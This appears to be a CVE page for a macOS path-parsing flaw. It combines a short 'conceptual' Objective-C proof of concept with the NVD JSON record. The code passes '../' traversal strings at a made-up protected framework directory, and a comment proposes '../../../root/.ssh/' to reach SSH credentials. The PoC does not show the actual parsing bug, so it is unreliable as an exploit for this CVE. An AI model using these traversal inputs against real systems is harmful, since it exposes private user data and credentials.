CVE-2025-43463

// CVE-2025-43463 Path Traversal PoC (Conceptual) // This is a conceptual proof-of-concept for demonstrating the path parsing issue #include <Foundation/Foundation.h> void exploitPathParsing() { // Example of malicious path that could bypass validation NSString *maliciousPath = @"../../../../System/Library/PrivateFrameworks/ SensitiveData.framework"; // Attempt to access protected directory through path traversal NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // This demonstrates the vulnerability where path validation is insufficient NSArray *contents = [fileManager contentsOfDirectoryAtPath:maliciousPath error:&error]; if (contents) { NSLog(@"Successfully accessed sensitive directory: %@", contents); } } // Example attack vector through vulnerable API void vulnerableAPIUsage(NSString *userInput) { // Simulating vulnerable code that doesn't properly validate paths NSString *basePath = @"/Users/Shared/"; NSString *targetPath = [basePath stringByAppendingString:userInput]; // Path like "../../../root/.ssh/" could be used for exploitation NSLog(@"Target path: %@", targetPath); } int main() { NSLog(@"CVE-2025-43463 Path Parsing Vulnerability PoC"); exploitPathParsing(); return 0; }

{"cve": {"id": "CVE-2025-43463", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:54.510", "lastModified": "2026-04-02T19:20:50.527", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.3, macOS Sonoma 14.8.3, macOS Tahoe 26.1. An app may be able to access sensitive user data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.8.3", "matchCriteriaId": "8E37DC2A-33E6-480B-8DFE-4F6558F0A895"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.3", "matchCriteriaId": "3428C860-E02D-4FE9-96F4-58EEAAB8321D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.1", "matchCriteriaId": "415C0BC8-2EAF-4247-AB6A-BD293014213C"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125634", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125887", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125888", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}